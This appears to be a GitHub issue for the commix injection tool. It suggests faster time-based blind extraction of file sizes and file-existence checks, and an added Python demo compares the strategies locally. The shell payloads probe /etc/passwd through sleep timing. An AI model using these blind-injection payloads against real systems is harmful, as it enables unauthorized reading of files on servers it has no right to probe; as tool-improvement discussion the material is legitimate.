Improve some aspects of "Time Based Exfiltration" #783

Open · Abyss-W4tcher opened this issue Oct 3, 2022 · 1 comment

Abyss-W4tcher commented Oct 3, 2022

Hi,

I was running commix against a time-based vulnerable host, and noticed that it took a lot of time to determine the size of a file when using --file-read. The problem is that it's using the increment technique (e.g. "Is the file size equal to 1?" No. "Is the file size equal to 2?" No. And so on).

Check this Python pseudo-code, which illustrates an idea to improve the efficiency:

stat --printf="%s" /etc/passwd -> 3671 (but it's blind, we don't see it directly)

import subprocess, time

def timed(cmd):
    # Run the injected command on the target and return how many whole seconds it took
    start = time.monotonic()
    subprocess.run(["sh", "-c", cmd], check=False)
    return round(time.monotonic() - start)

file_length = ''
cmd_output_length = timed('out_length=$(stat --printf="%s" /etc/passwd) && sleep $(expr length "$out_length")') # Grab output length, e.g. 4 in "3671"
for i in range(cmd_output_length):
     # We iterate over each character of the "stat" output, and sleep accordingly to its value
     file_length += str(timed(f'tts="$(stat --printf="%s" /etc/passwd | cut -c{i+1}-{i+1})" && sleep "$tts"')) # tts = time to sleep

# file_length = '3671'

It is not necessary to sleep 3 seconds for the digit 3: we can use the increment technique on each digit, as it may be faster too. The improvement resides in the stat --printf="%s" /etc/passwd call.

The time gained is considerable, I think, compared to the current version:

str="$(echo $(cat /etc/passwd))"
str1=$(expr length "$str")
if [ 22 -ne $str1 ]
then sleep 0
else sleep 1
fi 

I do not know the project well enough to provide a PR, but I'd like to hear your thoughts about this idea!

NB: I also noticed that commix wasn't checking if the file existed, or if it was empty. I think this could be easily fixed too:

test -f file || sleep 1 # Sleep if the file does not exist
[ -s file ] || sleep 1 # Sleep if the file is empty (or missing)
Abyss-W4tcher changed the title from "Improve a few aspects of "Time Based Exfiltration"" to "Improve some aspects of "Time Based Exfiltration"" on Oct 3, 2022
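The three payload strategies discussed in the comment above (the increment technique, the per-digit sleep, and the existence/emptiness pre-checks), run side by side so their query counts can be compared. This is an added example, not commix code and not code from the issue author. It assumes a local `sh` as the "target"; a shell function shadows `sleep` so the delay a payload would have caused is logged instead of waited for, which keeps the demo fast and deterministic (pass `simulate=False` to use the wall clock, as a real time-based oracle must). `wc -c` stands in for GNU `stat --printf="%s"` for portability, the 103-byte file is constructed sample data, and `size_by_digit_bisect` goes one step beyond the comment by bisecting each digit with one-second probes instead of sleeping the digit's value.

```python
"""Blind, time-based file-size extraction strategies run against a local shell."""
import os
import shlex
import subprocess
import tempfile
import time

# Constructed sample: a passwd-like line padded to exactly 103 bytes (digits 1, 0, 3).
SAMPLE = b"root:x:0:0:root:/root:/bin/bash\n".ljust(103, b"#")
# Shadows `sleep` on the simulated target: record the requested seconds instead of sleeping.
SLEEP_SHIM = 'sleep() { printf "%s\\n" "$1" >> "$SLEEPLOG"; }\n'


class TimingOracle:
    """All a blind injection gives us: how long a payload took (whole seconds)."""

    def __init__(self, simulate=True):
        self.simulate = simulate
        self.queries = 0

    def delay(self, payload):
        self.queries += 1
        if not self.simulate:  # real mode: measure wall-clock time of the actual sleeps
            start = time.monotonic()
            subprocess.run(["sh", "-c", payload], check=False)
            return round(time.monotonic() - start)
        fd, log = tempfile.mkstemp()
        os.close(fd)
        try:
            subprocess.run(["sh", "-c", SLEEP_SHIM + payload],
                           env={**os.environ, "SLEEPLOG": log}, check=False)
            with open(log) as fh:  # total seconds the payload asked sleep for
                return sum(int(float(x)) for x in fh.read().split())
        finally:
            os.unlink(log)


def size_cmd(path):
    """Shell prefix storing the byte size in $n (POSIX stand-in for stat --printf="%s")."""
    return f'n=$(wc -c < {shlex.quote(path)} | tr -d " ")'


def file_state(oracle, path):
    """Existence / emptiness pre-checks from the issue: two queries, before any probing."""
    f = shlex.quote(path)
    if oracle.delay(f"test -f {f} || sleep 1") >= 1:
        return "missing"
    if oracle.delay(f"[ -s {f} ] || sleep 1") >= 1:
        return "empty"
    return "nonempty"


def size_by_increment(oracle, path, limit=100000):
    """Increment technique: 'is the size equal to k?' for k = 1, 2, 3, ... (one query each)."""
    for k in range(1, limit + 1):
        if oracle.delay(f'{size_cmd(path)}; [ "$n" -eq {k} ] && sleep 1') >= 1:
            return k
    raise ValueError("file larger than limit")


def size_by_digit_sleep(oracle, path):
    """Issue's proposal: one query for the digit count, then sleep d seconds per digit d."""
    n_digits = oracle.delay(f'{size_cmd(path)}; sleep "${{#n}}"')
    digits = [oracle.delay(f'{size_cmd(path)}; sleep "$(printf %s "$n" | cut -c{i})"')
              for i in range(1, n_digits + 1)]
    return int("".join(str(d) for d in digits))


def size_by_digit_bisect(oracle, path):
    """Same idea, but each digit is found with at most four 'digit >= m?' one-second probes."""
    n_digits = oracle.delay(f'{size_cmd(path)}; sleep "${{#n}}"')
    value = 0
    for i in range(1, n_digits + 1):
        lo, hi = 0, 9
        while lo < hi:
            mid = (lo + hi + 1) // 2
            probe = (f'{size_cmd(path)}; d=$(printf %s "$n" | cut -c{i}); '
                     f'[ "$d" -ge {mid} ] && sleep 1')
            if oracle.delay(probe) >= 1:
                lo = mid
            else:
                hi = mid - 1
        value = value * 10 + lo
    return value


def demo(simulate=True):
    """Run every strategy on the constructed file; returns (result, queries used) per strategy."""
    tmp = tempfile.mkdtemp()
    target = os.path.join(tmp, "passwd")
    with open(target, "wb") as fh:
        fh.write(SAMPLE)
    empty = os.path.join(tmp, "empty")
    open(empty, "wb").close()
    results = {
        "state": file_state(TimingOracle(simulate), target),
        "state_empty": file_state(TimingOracle(simulate), empty),
        "state_missing": file_state(TimingOracle(simulate), os.path.join(tmp, "nope")),
    }
    for name, fn in (("increment", size_by_increment),
                     ("digit_sleep", size_by_digit_sleep),
                     ("digit_bisect", size_by_digit_bisect)):
        oracle = TimingOracle(simulate)
        results[name] = (fn(oracle, target), oracle.queries)
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:14} {value}")
```

For the 103-byte sample the increment technique needs 103 queries, the per-digit sleep needs 4 queries (but 1+0+3 plus 3 seconds of real delay), and the bisected variant needs at most 13 one-second queries; the trade-off between query count and seconds slept is what decides the best choice on a real, jittery target, where `round()` on a wall-clock delay also needs a margin for network latency.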
@stasinopoulos (Member)

@Abyss-W4tcher thanks for your suggestion. I will check it out in detail :)
